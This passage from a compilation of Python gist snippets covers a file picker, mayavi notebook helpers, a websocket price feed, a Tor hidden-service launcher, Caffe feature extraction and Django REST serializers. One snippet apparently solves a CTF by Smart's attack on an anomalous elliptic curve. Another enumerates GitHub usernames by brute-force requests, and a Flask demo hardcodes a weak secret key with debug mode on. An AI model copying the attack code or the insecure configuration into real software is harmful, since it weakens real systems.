node = FileTreeNode(full_path, self.show_size, self.select_dirs, self.file_pattern)
node.level = self.level + 1
children.append(node)
self.expanded = True
self.children = sorted(children, key=attrgetter('leaf', 'cmp_title'))
# Just a simple demo of a custom TreeNode class... The TreeDialogController should be initialized with async_mode=True when using this class.
class FTPTreeNode (TreeNode):
def __init__(self, host, path=None, level=0):
TreeNode.__init__(self)
self.host = host
self.path = path
self.level = level
if path:
self.title = os.path.split(path)[1]
else:
self.title = self.host
self.leaf = path and len(os.path.splitext(path)[1]) > 0
self.icon_name = 'FileOther' if self.leaf else 'Folder'
def expand_children(self):
ftp = ftplib.FTP(self.host, timeout=10)
ftp.login('anonymous')
names = ftp.nlst(self.path or '')
ftp.quit()
self.children = [FTPTreeNode(self.host, name, self.level+1) for name in names]
self.expanded = True
class TreeDialogController (object):
def __init__(self, root_node, allow_multi=False, async_mode=False):
self.async_mode = async_mode
self.allow_multi = allow_multi
self.selected_entries = None
self.table_view = ui.TableView()
self.table_view.frame = (0, 0, 500, 500)
self.table_view.data_source = self
self.table_view.delegate = self
self.table_view.flex = 'WH'
self.table_view.allows_multiple_selection = True
self.table_view.tint_color = 'gray'
self.view = ui.View(frame=self.table_view.frame)
self.view.add_subview(self.table_view)
self.view.name = root_node.title
self.busy_view = ui.View(frame=self.view.bounds, flex='WH', background_color=(0, 0, 0, 0.35))
hud = ui.View(frame=(self.view.center.x - 50, self.view.center.y - 50, 100, 100))
hud.background_color = (0, 0, 0, 0.7)
hud.corner_radius = 8.0
hud.flex = 'TLRB'
spinner = ui.ActivityIndicator()
spinner.style = ui.ACTIVITY_INDICATOR_STYLE_WHITE_LARGE
spinner.center = (50, 50)
spinner.start_animating()
hud.add_subview(spinner)
self.busy_view.add_subview(hud)
self.busy_view.alpha = 0.0
self.view.add_subview(self.busy_view)
self.done_btn = ui.ButtonItem(title='Done', action=self.done_action)
if self.allow_multi:
self.view.right_button_items = [self.done_btn]
self.done_btn.enabled = False
self.root_node = root_node
self.entries = []
self.flat_entries = []
if self.async_mode:
self.set_busy(True)
t = threading.Thread(target=self.expand_root)
t.start()
else:
self.expand_root()
def expand_root(self):
self.root_node.expand_children()
self.set_busy(False)
self.entries = self.root_node.children
self.flat_entries = self.entries
self.table_view.reload()
def flatten_entries(self, entries, dest=None):
if dest is None:
dest = []
for entry in entries:
dest.append(entry)
if not entry.leaf and entry.expanded:
self.flatten_entries(entry.children, dest)
return dest
def rebuild_flat_entries(self):
self.flat_entries = self.flatten_entries(self.entries)
def tableview_number_of_rows(self, tv, section):
return len(self.flat_entries)
def tableview_cell_for_row(self, tv, section, row):
cell = ui.TableViewCell()
entry = self.flat_entries[row]
level = entry.level - 1
image_view = ui.ImageView(frame=(44 + 20*level, 5, 34, 34))
label_x = 44+34+8+20*level
label_w = cell.content_view.bounds.w - label_x - 8
if entry.subtitle:
label_frame = (label_x, 0, label_w, 26)
sub_label = ui.Label(frame=(label_x, 26, label_w, 14))
sub_label.font = ('<System>', 12)
sub_label.text = entry.subtitle
sub_label.text_color = '#999'
cell.content_view.add_subview(sub_label)
else:
label_frame = (label_x, 0, label_w, 44)
label = ui.Label(frame=label_frame)
if entry.subtitle:
label.font = ('<System>', 15)
else:
label.font = ('<System>', 18)
label.text = entry.title
label.flex = 'W'
cell.content_view.add_subview(label)
if entry.leaf and not entry.enabled:
label.text_color = '#999'
cell.content_view.add_subview(image_view)
if not entry.leaf:
has_children = entry.expanded
btn = ui.Button(image=ui.Image.named('CollapseFolder' if has_children else 'ExpandFolder'))
btn.frame = (20*level, 0, 44, 44)
btn.action = self.expand_dir_action
cell.content_view.add_subview(btn)
if entry.icon_name:
image_view.image = ui.Image.named(entry.icon_name)
else:
image_view.image = None
cell.selectable = entry.enabled
return cell
def row_for_view(self, sender):
'''Helper to find the row index for an 'expand' button'''
cell = ObjCInstance(sender)
while not cell.isKindOfClass_(ObjCClass('UITableViewCell')):
cell = cell.superview()
return ObjCInstance(self.table_view).indexPathForCell_(cell).row()
def expand_dir_action(self, sender):
'''Invoked by 'expand' button'''
row = self.row_for_view(sender)
entry = self.flat_entries[row]
if entry.expanded:
sender.image = ui.Image.named('ExpandFolder')
else:
sender.image = ui.Image.named('CollapseFolder')
self.toggle_dir(row)
self.update_done_btn()
def toggle_dir(self, row):
'''Expand or collapse a folder node'''
entry = self.flat_entries[row]
if entry.expanded:
entry.collapse_children()
old_len = len(self.flat_entries)
self.rebuild_flat_entries()
num_deleted = old_len - len(self.flat_entries)
deleted_rows = range(row + 1, row + num_deleted + 1)
self.table_view.delete_rows(deleted_rows)
else:
if self.async_mode:
self.set_busy(True)
expand = functools.partial(self.do_expand, entry, row)
t = threading.Thread(target=expand)
t.start()
else:
self.do_expand(entry, row)
def do_expand(self, entry, row):
'''Actual folder expansion (called on background thread if async_mode is enabled)'''
entry.expand_children()
self.set_busy(False)
old_len = len(self.flat_entries)
self.rebuild_flat_entries()
num_inserted = len(self.flat_entries) - old_len
inserted_rows = range(row + 1, row + num_inserted + 1)
self.table_view.insert_rows(inserted_rows)
def tableview_did_select(self, tv, section, row):
self.update_done_btn()
def tableview_did_deselect(self, tv, section, row):
self.update_done_btn()
def update_done_btn(self):
'''Deactivate the done button when nothing is selected'''
selected = [self.flat_entries[i[1]] for i in self.table_view.selected_rows if self.flat_entries[i[1]].enabled]
if selected and not self.allow_multi:
self.done_action(None)
else:
self.done_btn.enabled = len(selected) > 0
def set_busy(self, flag):
'''Show/hide spinner overlay'''
def anim():
self.busy_view.alpha = 1.0 if flag else 0.0
ui.animate(anim)
def done_action(self, sender):
self.selected_entries = [self.flat_entries[i[1]] for i in self.table_view.selected_rows if self.flat_entries[i[1]].enabled]
self.view.close()
def file_picker_dialog(title=None, root_dir=None, multiple=False,
select_dirs=False, file_pattern=None, show_size=True):
if root_dir is None:
root_dir = os.path.expanduser('~/Documents')
if title is None:
title = os.path.split(root_dir)[1]
    root_node = FileTreeNode(root_dir, show_size, select_dirs, file_pattern)
root_node.title = title or ''
picker = TreeDialogController(root_node, allow_multi=multiple)
picker.view.present('sheet')
picker.view.wait_modal()
if picker.selected_entries is None:
return None
paths = [e.path for e in picker.selected_entries]
if multiple:
return paths
else:
return paths[0]
def ftp_dialog(host='mirrors.kernel.org'):
# This is just a demo of how TreeDialogController is
# extensible with custom TreeNode subclasses, so there
# aren't as many options as for the regular file dialog.
root_node = FTPTreeNode(host)
picker = TreeDialogController(root_node, async_mode=True)
picker.view.present('sheet')
picker.view.wait_modal()
if picker.selected_entries:
return picker.selected_entries[0].path
def main():
py_files = file_picker_dialog('Pick some .py files', multiple=True, select_dirs=False, file_pattern=r'^.*\.py$')
print('Picked from ~/Documents:', py_files)
ftp_file = ftp_dialog()
print('Picked from FTP server:', ftp_file)
if __name__ == '__main__':
main()
```
#### File: hard-gists/e41abdd59c5308eacf84/snippet.py
```python
from __future__ import print_function, division
import sys
import mayavi # pylint: disable=import-error,unused-import
from mayavi import mlab # pylint: disable=import-error
from traits.trait_errors import TraitError
__author__ = "<NAME>"
__copyright__ = "Copyright 2015"
__license__ = "MIT License"
_prev_offscreen_state = None
def _resize_window(size, fig=None):
if fig is None:
fig = mlab.gcf()
try:
# scene.set_size doesn't seem to work on linux && os x, so
# go into the backend and do it by hand
if sys.platform == "darwin" or sys.platform.startswith('linux'):
toolkit = mayavi.ETSConfig.toolkit
if toolkit == 'qt4':
sc = fig.scene
window_height = sc.control.parent().size().height()
render_height = sc.render_window.size[1]
h = window_height - render_height
sc.control.parent().resize(size[0], size[1] + h)
elif toolkit == 'wx':
w, h = size[0], size[1]
fig.scene.control.Parent.Parent.SetClientSizeWH(w, h)
else:
print("Unknown mayavi backend {0} (not qt4 or "
"wx); not resizing.".format(toolkit), file=sys.stderr)
else:
fig.scene.set_size(size)
except Exception as e:
print("Resize didn't work:: {0}".format(repr(e)), file=sys.stderr)
def imayavi_show_window(fig, debug=False):
"""Try to show the window; only does something on Qt backend"""
try:
# fig.scene.control.parent().show()
fig.scene.control.parent().showNormal()
except Exception as e: # pylint: disable=broad-except,unused-variable
if debug:
print("Window show didn't work::", repr(e))
def imayavi_hide_window(fig, debug=False):
"""Try to hide the window; only does something on Qt backend"""
try:
# fig.scene.control.parent().hide()
fig.scene.control.parent().showMinimized()
except Exception as e: # pylint: disable=broad-except,unused-variable
if debug:
print("Window hide didn't work::", repr(e))
def imayavi_show_inline(fig=None, size=None, antialiased=True, hide=True,
**kwargs):
"""Display a mayavi figure inline in an ipython notebook.
This function takes a screenshot of a figure and blits it to a matplotlib
figure using matplotlib.pyplot.imshow()
Args:
fig: A mayavi figure, if not specified, uses mlab.gcf()
size (None, tuple): if given, resize the scene in pixels (x, y)
hide (bool): if True, try to hide the render window
kwargs: passed to mayavi.mlab.screenshot()
"""
from matplotlib import pyplot as plt
if fig is None:
fig = mlab.gcf()
# try to show the window... Qt backend only, necessary if this is
# the 2nd call, and we hid the previous window
# imayavi_show_window(fig)
if size is not None:
_resize_window(size, fig=fig)
pixmap = mlab.screenshot(fig, antialiased=antialiased, **kwargs)
# try to hide the window... Qt backend only
if hide:
imayavi_hide_window(fig)
pltfig = plt.figure()
dpi = pltfig.get_dpi()
pltfig.set_size_inches([s / dpi for s in fig.scene.get_size()])
ax = pltfig.gca()
ax.imshow(pixmap)
ax.axis('off')
plt.show()
def imayavi_show(fig=None, size=None, stop=True):
"""shortcut for `mayavi.mlab.show(stop=True)`"""
if sys.platform != "darwin":
print("Warning: Since linux uses offscreen rendering, imayavi_show()\n"
"won't work. To interact with a plot, turn off\n"
"offscreen rendering and recreate the plot. Remember to\n"
"re-enable offscreen rendering if making future inline plots.\n",
file=sys.stderr)
if fig is None:
fig = mlab.gcf()
imayavi_show_window(fig)
if size is not None:
_resize_window(size, fig=fig)
mlab.show(stop=stop)
def imayavi_remove_source(src):
"""Safely remove a specific vtk source
Args:
src (vtk_data_source): vtk data source to remove
"""
src.stop()
try:
try:
src.data.release_data()
except TraitError:
src.data.release_data_flag = 1
src.cell_scalars_name = ''
src.cell_tensors_name = ''
src.cell_vectors_name = ''
src.point_scalars_name = ''
src.point_tensors_name = ''
src.point_vectors_name = ''
except AttributeError:
pass
src.start()
src.stop()
src.remove()
def imayavi_clear_data(scenes=None):
"""Workaround for Mayavi / VTK memory leak
This is needed when Mayavi/VTK keeps a reference to source data
when you would expect it to be freed like on a call to `mlab.clf()`
or when removing sources from the pipeline.
Note:
This must be called when the pipeline still has the source, so
before a call to `mlab.clf()`, etc.
1. Set release_data_flag on all sources' data
2. Remove reference to the data
3. Remove the data source
Args:
scene (None, mayavi.core.scene.Scene, or 'all'): if None, gets
current scene; if Scene object, just that one; if 'all',
act on all scenes in the current engine. Can also be a list
of Scene objects
"""
if scenes is None:
scenes = [mlab.get_engine().current_scene]
elif scenes == "all":
scenes = mlab.get_engine().scenes
if not isinstance(scenes, (list, tuple)):
scenes = [scenes]
if all(s is None for s in scenes):
return
for s in scenes:
s.stop()
for child in list(s.children):
imayavi_remove_source(child)
s.start()
return
def load_ipython_extension(ipython):
ipython.enable_matplotlib(gui="inline")
# linux needs to render offscreen, OS X + Qt apparently doesn't
global _prev_offscreen_state # pylint: disable=global-statement
_prev_offscreen_state = mlab.options.offscreen
if sys.platform != "darwin":
mlab.options.offscreen = True
ipython.push("mayavi", interactive=True)
ipython.push("mlab", interactive=True)
ipython.push("imayavi_show_inline", interactive=True)
ipython.push("imayavi_show", interactive=True)
ipython.push("imayavi_remove_source", interactive=True)
ipython.push("imayavi_clear_data", interactive=True)
ipython.push("imayavi_show_window", interactive=True)
ipython.push("imayavi_hide_window", interactive=True)
def unload_ipython_extension(ipython):
if sys.platform != "darwin":
mlab.options.offscreen = _prev_offscreen_state
ipython.drop_by_id(dict(imayavi_show_inline=imayavi_show_inline,
imayavi_show=imayavi_show,
imayavi_remove_source=imayavi_remove_source,
imayavi_clear_data=imayavi_clear_data,
imayavi_show_window=imayavi_show_window,
imayavi_hide_window=imayavi_hide_window))
##
## EOF
##
```
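Usage is implicit in `load_ipython_extension` above; a short, hypothetical sketch of driving it from an IPython notebook follows. The module name `imayavi` and the test figure are assumptions for illustration, not part of the original gist.

```python
# Hypothetical notebook usage, assuming the gist is saved as `imayavi.py`
# somewhere importable. `%load_ext imayavi` calls load_ipython_extension(),
# which pushes mlab and the imayavi_* helpers into the interactive namespace.
get_ipython().run_line_magic('load_ext', 'imayavi')  # same as: %load_ext imayavi
mlab.test_plot3d()                                   # draw something simple
imayavi_show_inline(size=(600, 400))                 # screenshot it into the notebook
```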
#### File: hard-gists/e4907ccc9f6c1bb49b17/snippet.py
```python
from itertools import product
from sys import argv
from random import shuffle
from urllib.request import urlopen
from urllib.error import HTTPError
def main(args):
letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
combinations = [''.join(i) for i in product(letters, repeat=(int(args[1]) if len(args) > 1 else 2))]
shuffle(combinations)
for username in combinations:
try:
urlopen('https://github.com/' + username)
except HTTPError:
print(username + " is available!")
if __name__ == '__main__':
main(argv)
```
#### File: hard-gists/e5fe0a832872c2b1cebe473c7cf6fb07/snippet.py
```python
import websocket
import sys
from datetime import datetime, timedelta, timezone
import sched, time
import json
JST = timezone(timedelta(hours=+9), 'JST')
class GdaxStream():
endpoint = "wss://ws-feed.gdax.com"
def __init__(self):
#websocket.enableTrace(True)
self.ws = websocket.WebSocketApp(
GdaxStream.endpoint,
on_message = self.on_message,
on_error = self.on_error,
on_close = self.on_close
)
self.ws.on_open = self.on_open
try:
self.run()
except KeyboardInterrupt:
self.ws.close()
def run(self):
print("### run ###")
self.ws.run_forever()
pass
def on_message(self, ws, message):
now = datetime.now(JST)
print(str(now), message)
def on_error(self, ws, error):
print(error)
sys.exit()
def on_close(self, ws):
print("### closed ###")
def on_open(self, ws):
print("### open ###")
ws.send(json.dumps({"type": "subscribe","product_ids": ["BTC-USD"]}))
if __name__=="__main__":
GdaxStream()
```
#### File: hard-gists/e76e7c2a2aff228d7807/snippet.py
```python
from sage.all import *
p = 16857450949524777441941817393974784044780411511252189319
A = 16857450949524777441941817393974784044780411507861094535
B = 77986137112576
E = EllipticCurve(GF(p), [A, B])
print E.order() == p
g = E(5732560139258194764535999929325388041568732716579308775, 14532336890195013837874850588152996214121327870156054248)
v = E(2609506039090139098835068603396546214836589143940493046, 8637771092812212464887027788957801177574860926032421582)
def hensel_lift(curve, p, point):
A, B = map(long, (E.a4(), E.a6()))
x, y = map(long, point.xy())
fr = y**2 - (x**3 + A*x + B)
t = (- fr / p) % p
t *= inverse_mod(2 * y, p) # (y**2)' = 2 * y
t %= p
new_y = y + p * t
return x, new_y
# lift points
x1, y1 = hensel_lift(E, p, g)
x2, y2 = hensel_lift(E, p, v)
# calculate new A, B (actually, they will be the same here)
mod = p ** 2
A2 = y2**2 - y1**2 - (x2**3 - x1**3)
A2 = A2 * inverse_mod(x2 - x1, mod)
A2 %= mod
B2 = y1**2 - x1**3 - A2 * x1
B2 %= mod
# new curve
E2 = EllipticCurve(IntegerModRing(p**2), [A2, B2])
# calculate dlog
g2s = (p - 1) * E2(x1, y1)
v2s = (p - 1) * E2(x2, y2)
x1s, y1s = map(long, g2s.xy())
x2s, y2s = map(long, v2s.xy())
dx1 = (x1s - x1) / p % p
dx2 = (y1s - y1) / p
dy1 = (x2s - x2)
dy2 = (y2s - y2) % p
print "%d, %d, %d, %d, %d" % (dx1, dy1, dx2, dy2, p)
m = dy1 * inverse_mod(dx1, p) * dx2 * inverse_mod(dy2, p)
m %= p
print m
```
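A one-line sanity check, not in the original gist, that the recovered scalar really is the discrete log of v to base g on the original curve:

```python
# Sanity check (not part of the original): should print True if the
# p-adic lift and division above recovered the correct discrete log.
print m * g == v
```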
#### File: hard-gists/e99c114a5b33cd2da538/snippet.py
```python
import sys
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.admin import Admin
from flask.ext.admin.contrib.sqla import ModelView
app = Flask(__name__)
app.config['SECRET_KEY'] = '123456790'
# Create in-memory database
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.sqlite'
# Set echo for debug purposes
app.config['SQLALCHEMY_ECHO'] = True
# Create db instance
db = SQLAlchemy(app)
# Create admin instance
admin = Admin(app)
class Product(db.Model):
__tablename__ = 'product'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Unicode(200), nullable=False)
# cover image foreign key
# use_alter=True along with name='' adds this foreign key after Image has been created to avoid circular dependency
cover_id = db.Column(db.Integer, db.ForeignKey('image.id', use_alter=True, name='fk_product_cover_id'))
# cover image one-to-one relationship
    # set post_update=True to avoid circular dependency during flush
cover = db.relationship('Image', foreign_keys=cover_id, post_update=True)
class Image(db.Model):
__tablename__ = 'image'
id = db.Column(db.Integer, primary_key=True)
path = db.Column(db.String(200), nullable=False)
product_id = db.Column(db.Integer, db.ForeignKey(Product.id))
# product gallery many-to-one
product = db.relationship(Product, foreign_keys=product_id, backref='images')
# nothing special was need in Image, all circular dependencies were solved in Product
# Need to implement custom Image list
class ProductView(ModelView):
def __init__(self, session, **kwargs):
super(ProductView, self).__init__(Product, session,**kwargs)
class ImageView(ModelView):
def __init__(self, session, **kwargs):
super(ImageView, self).__init__(Image, session,**kwargs)
admin.add_view(ProductView(db.session))
admin.add_view(ImageView(db.session))
if __name__ == '__main__':
# Create tables
db.create_all()
# Run in debug mode
app.debug = True
# Go!
app.run()
```
#### File: hard-gists/e9fb36ca2220a167b7ed/snippet.py
```python
from PIL import Image
import numpy as np
import sys, math
if len(sys.argv) == 1:
print("Usage: img2irc.py image.png [-rgb]")
sys.exit(1)
image = sys.argv[1]
try:
rgb = True if sys.argv[2] == "-rgb" else False
except IndexError:
rgb = False
if not rgb:
from colormath.color_objects import LabColor, sRGBColor
from colormath.color_conversions import convert_color
img = Image.open(image).convert('RGBA')
arr = np.array(np.asarray(img).astype('float'))
def distance(c1, c2):
if rgb:
(r1,g1,b1) = (c1[0], c1[1], c1[2])
(r2,g2,b2) = (c2[0], c2[1], c2[2])
else:
rgb1 = sRGBColor(c1[0], c1[1], c1[2])
rgb2 = sRGBColor(c2[0], c2[1], c2[2])
lab1 = convert_color(rgb1, LabColor)
lab2 = convert_color(rgb2, LabColor)
(r1,g1,b1) = lab1.lab_l, lab1.lab_a, lab1.lab_b
(r2,g2,b2) = lab2.lab_l, lab2.lab_a, lab2.lab_b
return math.sqrt((r1 - r2)**2 + (g1 - g2) ** 2 + (b1 - b2) **2)
ircColors = {(211, 215, 207): 0,
(46, 52, 54): 1,
(52, 101, 164): 2,
(78, 154, 6): 3,
(204, 0, 0): 4,
(143, 57, 2): 5,
(92, 53, 102): 6,
(206, 92, 0): 7,
(196, 160, 0): 8,
(115, 210, 22): 9,
(17, 168, 121): 10,
(88, 161, 157): 11,
(87, 121, 158): 12,
(160, 67, 101): 13,
(85, 87, 83): 14,
(136, 137, 133): 15}
colors = list(ircColors.keys())
for line in arr:
row = ""
for pixel in line:
if pixel[3] == 0:
row += "\003 " # \003 to close any potential open color tag
else:
closest_colors = sorted(colors, key=lambda color: distance(color, pixel))
closest_color = closest_colors[0]
row += "\003{0},{0} ".format(ircColors[closest_color])
print(row)
```
#### File: hard-gists/ea46edc315b0f94d03b9/snippet.py
```python
import codecs
import os
import sys
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
def get_document_filenames(document_path='/home/tool/document_text'):
return [os.path.join(document_path, each)
for each in os.listdir(document_path)]
def create_vectorizer():
# Arguments here are tweaked for working with a particular data set.
# All that's really needed is the input argument.
return TfidfVectorizer(input='filename', max_features=200,
token_pattern='(?u)\\b[a-zA-Z]\\w{2,}\\b',
max_df=0.05,
stop_words='english',
ngram_range=(1, 3))
def display_scores(vectorizer, tfidf_result):
# http://stackoverflow.com/questions/16078015/
scores = zip(vectorizer.get_feature_names(),
np.asarray(tfidf_result.sum(axis=0)).ravel())
sorted_scores = sorted(scores, key=lambda x: x[1], reverse=True)
for item in sorted_scores:
print "{0:50} Score: {1}".format(item[0], item[1])
def main():
vectorizer = create_vectorizer()
tfidf_result = vectorizer.fit_transform(get_document_filenames())
display_scores(vectorizer, tfidf_result)
if __name__ == '__main__':
sys.stdout = codecs.getwriter('utf-8')(sys.stdout)
main()
```
#### File: hard-gists/ec0dbce5688e6fcd2cb91ac1fb7d03ca/snippet.py
```python
import lx
import lx.symbol as symbols
# Save this into your MODO scripts directory.
# Example usage:
# Find symbols with value of enable
# import symbolUtils as su
# su.find('enable', printOut=True)
# Find symbols with value containing enable
# import symbolUtils as su
# su.contains('enable', printOut=True)
# Find symbols containing ENABLE
# import symbolUtils as su
# su.findSymbols('ENABLE', printOut=True)
def find(value, ignoreCase=False, printOut=False, withlxsymbol=False):
res = []
if ignoreCase:
res = [x for x in dir(symbols) if value.lower() == getattr(symbols, x).lower()]
else:
res = [x for x in dir(symbols) if value == getattr(symbols, x)]
if printOut:
printList(res, withlxsymbol)
return res
def contains(value, ignoreCase=False, printOut=False, withlxsymbol=False):
res = []
if ignoreCase:
res = [x for x in dir(symbols) if value.lower() in getattr(symbols, x).lower()]
else:
res = [x for x in dir(symbols) if value in getattr(symbols, x)]
if printOut:
printList(res, withlxsymbol)
return res
def findSymbols(value, ignoreCase=False, printOut=False, withlxsymbol=False):
res = []
if ignoreCase:
res = [x for x in dir(symbols) if value.lower() in x.lower()]
else:
res = [x for x in dir(symbols) if value in x]
if printOut:
printList(res, withlxsymbol)
return res
def printList(entries, withlxsymbol=False):
if withlxsymbol:
print '\nlx.symbol.'.join(entries)
else:
print '\n'.join(entries)
```
#### File: hard-gists/ec8f1689bfde3ce9a920/snippet.py
```python
import sys, threading, time
from stem.control import Controller
from stem import SocketError, UnsatisfiableRequest
import stem.process
from stem.util import term
from flask import Flask
import socks
WEB_PORT = 8080
CONTROL_PORT = 7001
SOCKS_PORT = 7000
HIDDEN_SERVICE_DIR = '/tmp/tor/'
app = Flask(__name__)
@app.route('/')
def index():
return "hello world"
def start_web_app():
print 'Starting web app'
app.run(port=WEB_PORT, threaded=True)
def print_bootstrap_lines(line):
if "Bootstrapped " in line:
print(term.format(line, term.Color.BLUE))
def main():
print(term.format("Starting Tor:\n", term.Attr.BOLD))
tor_process = stem.process.launch_tor_with_config(
config = {
'SocksPort': str(SOCKS_PORT),
'ControlPort': str(CONTROL_PORT),
'ExitNodes': '{ru}',
},
init_msg_handler = print_bootstrap_lines,
)
# Start the flask web app in a separate thread
t = threading.Thread(target=start_web_app)
t.daemon = True
t.start()
# Connect to the Tor control port
try:
c = Controller.from_port(port=CONTROL_PORT)
c.authenticate()
except SocketError:
print 'Cannot connect to Tor control port'
sys.exit()
# Create an ephemeral hidden service
try:
print 'Creating hidden service'
result = c.create_hidden_service(HIDDEN_SERVICE_DIR, 80, target_port=8080)
print " * Created host: %s" % result.hostname
onion = result.hostname
except UnsatisfiableRequest:
print 'Cannot create ephemeral hidden service, Tor version is too old'
sys.exit()
except Exception, e:
print e
sys.exit()
t.join()
if __name__ == '__main__':
main()
```
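The comment in `main()` mentions an ephemeral hidden service, but `create_hidden_service` writes keys under `HIDDEN_SERVICE_DIR`. A hedged sketch of the truly ephemeral variant, assuming a stem release (1.4 or later) that exposes `create_ephemeral_hidden_service`:

```python
# Hedged sketch, not part of the original gist: requires stem >= 1.4 and a
# reasonably recent Tor. Maps public port 80 to the local Flask app on 8080
# without writing any keys to disk.
response = c.create_ephemeral_hidden_service({80: 8080}, await_publication=True)
print 'Ephemeral host: %s.onion' % response.service_id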
#### File: hard-gists/ec9c9074373d2443594a/snippet.py
```python
import sys
import os.path
import argparse
import numpy as np
from scipy.misc import imread, imresize
import scipy.io
import cPickle as pickle
parser = argparse.ArgumentParser()
parser.add_argument('--caffe',
help='path to caffe installation')
parser.add_argument('--model_def',
help='path to model definition prototxt')
parser.add_argument('--model',
help='path to model parameters')
parser.add_argument('--files',
                    help='path to a file containing a list of images')
parser.add_argument('--gpu',
action='store_true',
help='whether to use gpu training')
parser.add_argument('--layer',help='which layer to extract features e.g conv5_3')
parser.add_argument('--out',help='name of the pickle file where to store the features')
args = parser.parse_args()
if args.caffe:
caffepath = args.caffe + '/python'
sys.path.append(caffepath)
import caffe
def predict(in_data, net):
"""
Get the features for a batch of data using network
Inputs:
in_data: data batch
"""
out = net.forward(**{net.inputs[0]: in_data})
out_pool = net.forward(data = in_data, end = args.layer)
features = out_pool[args.layer]
return features
def batch_predict(filenames, net):
"""
Get the features for all images from filenames using a network
Inputs:
filenames: a list of names of image files
Returns:
an array of feature vectors for the images in that file
"""
N, C, H, W = net.blobs[net.inputs[0]].data.shape
Nf = len(filenames)
Hi, Wi, _ = imread(filenames[0]).shape
F = net.blobs[args.layer].data.shape
allftrs = np.zeros((Nf,) + F[1:])
for i in range(0, Nf, N):
in_data = np.zeros((N, C, H, W), dtype=np.float32)
batch_range = range(i, min(i+N, Nf))
batch_filenames = [filenames[j] for j in batch_range]
Nb = len(batch_range)
batch_images = np.zeros((Nb, 3, H, W))
for j,fname in enumerate(batch_filenames):
im = imread(fname)
if len(im.shape) == 2:
im = np.tile(im[:,:,np.newaxis], (1,1,3))
# RGB -> BGR
im = im[:,:,(2,1,0)]
# mean subtraction
im = im - np.array([103.939, 116.779, 123.68])
# resize
im = imresize(im, (H, W), 'bicubic')
# get channel in correct dimension
im = np.transpose(im, (2, 0, 1))
batch_images[j,:,:,:] = im
# insert into correct place
in_data[0:len(batch_range), :, :, :] = batch_images
# predict features
ftrs = predict(in_data, net)
for j in range(len(batch_range)):
allftrs[i+j,:] = ftrs[j,:]
print 'Done %d/%d files' % (i+len(batch_range), len(filenames))
return allftrs
if args.gpu:
caffe.set_mode_gpu()
else:
caffe.set_mode_cpu()
net = caffe.Net(args.model_def, args.model, caffe.TEST)
print 'list of all blobs and their shapes:'
for blob in net.blobs:
print blob,':',net.blobs[blob].data.shape
filenames = []
base_dir = os.path.dirname(args.files)
with open(args.files) as fp:
for line in fp:
filename = os.path.join(base_dir, line.strip().split()[0])
filenames.append(filename)
allftrs = batch_predict(filenames, net)
pkl_output = {}
pkl_output['filenames'] = filenames
pkl_output['features'] = allftrs
if args.out:
# store the features in a pickle file
with open(args.out, 'w') as fp:
pickle.dump(pkl_output, fp)
#scipy.io.savemat(os.path.join(base_dir, args.out+'.vgg_feats.mat'), mdict = {'features': np.transpose(allftrs), 'filenames' : filenames})
```
#### File: hard-gists/ee837b44613ce93064aa/snippet.py
```python
import six
from rest_framework import serializers, exceptions, parsers
class PullSerializerMixin(object):
pull_model = None
def __init__(self, *args, **kwargs):
self.pull_model = kwargs.pop('pull_model', self.pull_model)
super(PullSerializerMixin, self).__init__(*args, **kwargs)
def get_pull_model(self):
if not self.pull_model:
raise NotImplementedError("pull_model not specified")
return self.pull_model
def pull_fields(pull_spec):
"""
identify fields required at root of pull spec
"""
fields = []
for item in pull_spec:
if isinstance(item, dict):
for k in item.iterkeys():
fields.append(k)
elif isinstance(item, basestring):
fields.append(item)
else:
raise AssertionError("Expected dicts and strings, got {}".format(item))
return set(fields)
def pull_field_spec(pull_spec, field_name):
"""
Looks for recursive field definition in pull spec.
Match is dict key of field_name, associated value is field pull spec.
"""
for item in pull_spec:
if isinstance(item, dict):
for k, v in item.iteritems():
if field_name == k:
return v
def select_keys(m, ks):
"""
Destructively select keys on map, uses m.pop(k).
"""
for k in set(m.keys()) - set(ks):
m.pop(k)
class PullMixin(object):
"""
Pull API integration. Serializer fields will be filtered
based on the recursive pull spec provided as query param.
TODO: This seems to cause a conflict with setting metadata_class
which I'm yet to investigate.
"""
serializer_pull_field_mapping = {}
default_pull_parser = parsers.JSONParser
pull_allowed_methods = ['GET']
def pull_parser(self):
for parser in self.request.parsers:
if parser.media_type == self.request.accepted_media_type:
return parser
return self.default_pull_parser
@property
def pull_spec(self):
if not hasattr(self, "_pull"):
self._pull = None
if 'pull' in self.request.query_params:
try:
parser_class = self.pull_parser()
self._pull = parser_class().parse(
six.StringIO(self.request.query_params['pull'])
)
except ValueError as e:
pass
return self._pull
def get_serializer(self, *args, **kwargs):
serializer = super(PullMixin, self).get_serializer(*args, **kwargs)
if self.pull_spec and self.request.method in self.pull_allowed_methods:
self.recursive_select_keys(serializer, self.pull_spec)
return serializer
def get_pull_serializer(self, model, *args, **kwargs):
"""
Return the serializer instance that should be used for serializing model.
"""
serializer_class = self.get_pull_serializer_class(model)
return serializer_class(*args, **kwargs)
def get_pull_serializer_class(self, model):
"""
Return the class to use for the model serializer.
Defaults to using `self.pull_serializer_class`.
"""
if model in self.serializer_pull_field_mapping:
return self.serializer_pull_field_mapping[model]
raise exceptions.PermissionDenied(
"Model not whitelisted for pull: {}"
.format(model._meta))
def recursive_select_keys(self, serializer, pull_spec):
"""
Destructively and recursively filter serializer fields
based on pull_spec
"""
if not pull_spec: return
if isinstance(serializer, serializers.ListSerializer):
serializer = serializer.child
spec_fields = pull_fields(pull_spec)
if not "*" in spec_fields:
select_keys(serializer.fields, spec_fields)
for field_name, field in serializer.fields.iteritems():
field_spec = pull_field_spec(pull_spec, field_name)
if field_spec and isinstance(field, serializers.ManyRelatedField):
child = field.child_relation
if isinstance(child, PullSerializerMixin):
model = child.get_pull_model()
field = self.get_pull_serializer(model, read_only=True, many=True)
serializer.fields[field_name] = field
elif child.queryset is None:
raise exceptions.NotAcceptable(
"Unable to resolve pull serializer on ManyRelatedField which have no queryset. "
"Try using the PullSerializerMixin to specify reverse relations. "
)
else:
model = child.queryset.model
field = self.get_pull_serializer(model, read_only=True, many=True)
serializer.fields[field_name] = field
